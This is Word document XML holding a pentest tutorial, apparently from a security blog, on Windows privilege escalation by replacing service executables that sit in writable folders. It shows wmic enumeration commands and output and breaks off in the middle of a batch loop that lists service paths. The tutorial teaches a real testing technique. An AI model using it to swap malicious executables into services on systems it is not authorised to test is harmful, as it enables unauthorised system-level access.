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55D99" w14:textId="0E51288E" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK "https://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>windows pr</w:t>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vilege escalation via weak service permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36548E2D" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>When performing security testing on a Windows environment, or any environment for that matter, one of the things you’ll need to check is if you can escalate your privileges from a low privilege user to a high privileged user. No matter what environment you are testing there are going to be a range or roles with varying privileges, for the most part on a local windows environment there going to be three roles / privileged users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DF14C9" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>1. System 2. Administrator 3. Regular user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D44F3" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Most people would think administrator has the highest privilege but </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>actually it’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the system account. A regular user is typically the most limited role which may be so limited that it can’t even install software. In the previous paragraph I mentioned “local windows environment” that’s because when it comes to a network or </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>active directory</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> environment you have to take other things into consideration. The scenario I’ll be going over involves a single install of a windows operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB07A1" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> let’s say you’re performing a security test on a system / environment where all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>you’re</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> given is a low level privileged account but you want to try and escalate those privileges so that you can get “system” level privileges, what do you do? There are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>a number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> routes you can take. </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>Scott Sutherland</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> has written a nice article on </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>windows privilege escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> and some of the techniques that you can try. Also the guys over at </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>insomniasec.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> have put together a </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>nice document</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> as well that talks about windows privilege escalation. Last but certainly not least </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:instrText>HYPERLINK "http://pentestmonkey.net/tools/windows-privesc-check"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>pentestmonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> has written a python script</w:t>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> that will search the system for potential areas of privilege escalation and report back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E206DCD" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Obviously</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the technique I’m going to be discussing is leveraging windows services that have low or weak permissions. For those that aren’t aware a </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>windows service</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> is a process that is ran in the background and a regular user would never know that this process is running unless they specifically checked for it, meaning there is no “window” or </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>GUI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> associated with a service. But a service is just like a process in the fact that it’s an executable. You can determine all the services on your machine by using the “wmic” command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2121CB" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>wmic service list brief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1A5E28" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Your output should be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> below, I’ve snipped the output for brevity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9B1693" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>... snip ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BDCA69" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">1077      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>WMPNetworkSvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">                   0          Manual     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Stopped  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="490B0326" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">1077      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>WPCSvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">                          0          Manual     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Stopped  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="46849CF3" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">0         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>WPDBusEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">                      0          Manual     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Stopped  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6885EF71" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">0         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>wscsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">                          752        Auto       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Running  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="753FA1BB" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">0         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>WSearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">                         2140       Auto       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Running  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="252C816A" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">0         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>wuauserv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">                        856        Auto       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Running  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="376D8A5D" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>First column is the exit code, second column is the name of the service, third column is the process ID (PID) of the service, fourth column states how the service is to be started (start mode), fifth column states if the process is running (state), and the last column gives the status of the service itself. You can also right click on your taskbar, same bar as the start menu, then select task manager. Within the task manager you can select the “services” tab to see this same information, keep in mind there is no services tab within the task manager for XP for this scenario I’m using windows 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0061D6E0" w14:textId="2F252411" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F870A4" wp14:editId="06596931">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1809181655" name="Rectangle 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359ED" id="Rectangle 8" o:spid="_x0000_s1026" href="http://travisaltman.com/wp-content/service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47CEE9F" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>So now that you know how to determine what services are available and running on a particular machine how can we determine if they have “weak permissions”? By weak permissions I mean the folder where the service EXE is allows “write” access. Having write access allows me to replace that executable with my malicious executable, start the service and voila I’ve got access. That’s it in a nutshell but let’s walk through the steps to quickly determine which services are vulnerable and how to attack that vulnerable weak service permission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DB19CA" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>On a windows machine there can be a ton of services, going through each folder where the service executable is located, right clicking and determining the permission can be a pain in the butt. First thing we’ll need to do is run a couple of commands to easily pull all the permissions for all the services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B791BF1" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">for /f "tokens=2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>delims</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>='='" %a in ('wmic service list full^|find /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
